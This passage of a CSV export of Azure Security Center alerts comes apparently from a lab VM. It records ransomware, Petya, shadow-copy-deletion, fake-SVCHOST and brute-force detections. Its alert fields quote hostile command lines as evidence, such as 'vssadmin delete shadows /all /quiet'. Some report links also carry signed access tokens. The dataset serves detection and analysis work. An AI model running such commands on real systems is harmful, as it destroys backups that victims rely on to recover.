""StartTimeUtc"": ""2019-01-15T13:15:16.6161476Z"",
""EndTimeUtc"": ""2019-01-15T13:15:16.6161476Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
158,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:18,2019-01-15 13:15:18,636ab38f-2528-4356-8602-d0910f8ac600,2518547426817428483_636ab38f-2528-4356-8602-d0910f8ac600,Detection,Microsoft,Ransomware indicators detected,Ransomware indicators detected,Ransomware indicators detected,"Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the host and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\ransomware.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1bc4"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=73fMV7Ybuo9CGINgrTRvGVKp5HKA1UVnhiGPZqkdK2Q%3D&spr=https&st=2019-01-15T11:39:21Z&se=2019-04-15T11:54:21Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""ransomware.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1bc4"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:18.2571516Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:18.2571516Z"",
""EndTimeUtc"": ""2019-01-15T13:15:18.2571516Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
159,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:18,2019-01-15 13:15:18,a4aa878d-93b5-4cd1-931f-30f85b9e6db2,2518547426817928329_a4aa878d-93b5-4cd1-931f-30f85b9e6db2,Detection,Microsoft,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Detected Petya ransomware indicators,Analysis of host data on MSTICALERTSWIN1 detected indicators associated with Petya ransomware. See https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/ for more information. Review the commandline associated in this alert and escalate this alert to your security team.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo rundll32.exe perfc.dat"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1b68"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Petya\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Petya.pdf?sv=2018-03-28&sr=b&sig=9E83f2V9Ix17hs7kF%2B%2FwVNoEivLC4GV%2FfNgRULmjp4U%3D&spr=https&st=2019-01-15T13:00:23Z&se=2019-04-15T13:15:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1b68"",
""CommandLine"": ""cmd /c echo rundll32.exe perfc.dat"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:18.207167Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:18.207167Z"",
""EndTimeUtc"": ""2019-01-15T13:15:18.207167Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
160,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:16,2019-01-15 13:15:16,88f9ae7a-e6b5-4b54-b967-08f3fc503d91,2518547426830640211_88f9ae7a-e6b5-4b54-b967-08f3fc503d91,Detection,Microsoft,Rare SVCHOST service group executed,Rare SVCHOST service group executed,Rare SVCHOST service group executed,The system process SVCHOST was observed running a rare service group. Malware often use SVCHOST to masquerade its malicious activity.,Informational,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\svchost.exe"",
""command line"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1984"",
""account logon id"": ""0x1794e44"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xe04"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=igCs0cA7B2rarN4kGRqCl473qJZoP8z6s8skpsDaBS0%3D&spr=https&st=2019-01-15T11:43:53Z&se=2019-04-15T11:58:53Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=a59677a1-917d-436c-8ede-6cc8220c9a45\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1984"",
""CommandLine"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:16.9359788Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:16.9359788Z"",
""EndTimeUtc"": ""2019-01-15T13:15:16.9359788Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
161,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:16,2019-01-15 13:15:16,b6e594ea-16d3-480e-81a7-2f8fe3af64ba,2518547426833434810_b6e594ea-16d3-480e-81a7-2f8fe3af64ba,Detection,Microsoft,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,"Analysis of host data has detected a shadow copy deletion activity on the resource.
Volume Shadow Copy (VSC) is an important artifact that stores data snapshots.
Some malware and specifically Ransomware, targets VSC to sabotage backup strategies.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\vssadmin.exe"",
""command line"": ""vssadmin delete shadows /all /quiet"",
""parent process"": ""cmd.exe"",
""process id"": ""0x18bc"",
""account logon id"": ""0x1794e44"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xe04"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=73fMV7Ybuo9CGINgrTRvGVKp5HKA1UVnhiGPZqkdK2Q%3D&spr=https&st=2019-01-15T11:39:21Z&se=2019-04-15T11:54:21Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""vssadmin.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x18bc"",
""CommandLine"": ""vssadmin delete shadows /all /quiet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:16.6565189Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:16.6565189Z"",
""EndTimeUtc"": ""2019-01-15T13:15:16.6565189Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
162,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:17,2019-01-15 13:15:17,846ec406-bb3e-451b-bf6f-9e1e17a69bd6,2518547426829675756_846ec406-bb3e-451b-bf6f-9e1e17a69bd6,Detection,Microsoft,Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),This is a test alert generated by Azure Security Center. No further action is needed.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\asc_alerttest_662jfi039n.exe"",
""Suspicious Command Line"": ""asc_alerttest_662jfi039n.exe -foo"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1990"",
""Arguments Auditing Enabled"": ""true"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""asc_alerttest_662jfi039n.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1990"",
""CommandLine"": ""asc_alerttest_662jfi039n.exe -foo"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:17.0324243Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:17.0324243Z"",
""EndTimeUtc"": ""2019-01-15T13:15:17.0324243Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
163,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:16,2019-01-15 13:15:16,a513ab17-2b6a-4b1a-a925-a0b3c21ec38c,2518547426831794607_a513ab17-2b6a-4b1a-a925-a0b3c21ec38c,Detection,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often use SVCHOST to masquerade its malicious activity.,High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x195c"",
""account logon id"": ""0x1794e44"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0xe04"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=kvCGJKKTPVYOeqAGnf8mV2pt8v2FotidDHnSqPJHG3Y%3D&spr=https&st=2019-01-15T11:49:35Z&se=2019-04-15T12:04:35Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x195c"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:16.8205392Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:16.8205392Z"",
""EndTimeUtc"": ""2019-01-15T13:15:16.8205392Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
164,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 13:15:15,2019-01-15 13:15:15,caa12d6c-4928-4787-90d4-cb27ff94373c,2518547426847947731_caa12d6c-4928-4787-90d4-cb27ff94373c,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\dubrute.exe' was running on the machine; this process is associated with carrying out brute force attacks. An attacker may have compromised this host as a launchpad for carrying out further attacks.',High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1794e44"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\dubrute.exe"",
""Suspicious Command Line"": "".\\dubrute.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1968"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0xe04"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1794e44""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""dubrute.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1968"",
""CommandLine"": "".\\dubrute.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T13:15:15.2052268Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1794e44"",
""StartTimeUtc"": ""2019-01-15T13:15:15.2052268Z"",
""EndTimeUtc"": ""2019-01-15T13:15:15.2052268Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 13:15:21,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
165,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:18,2019-01-15 17:15:18,34cc156e-9179-44c4-bd60-89dd1812e9e7,2518547282814913644_34cc156e-9179-44c4-bd60-89dd1812e9e7,Detection,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often use SVCHOST to masquerade its malicious activity.,High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x10dc"",
""account logon id"": ""0x1bd592e"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x12bc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=bPqI7AyBQickCDAwmDAc6APVZVb9pLEFo0ITaXfoM1U%3D&spr=https&st=2019-01-15T11:59:35Z&se=2019-04-15T12:14:35Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x10dc"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\svchost.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:18.5086355Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:18.5086355Z"",
""EndTimeUtc"": ""2019-01-15T17:15:18.5086355Z"",
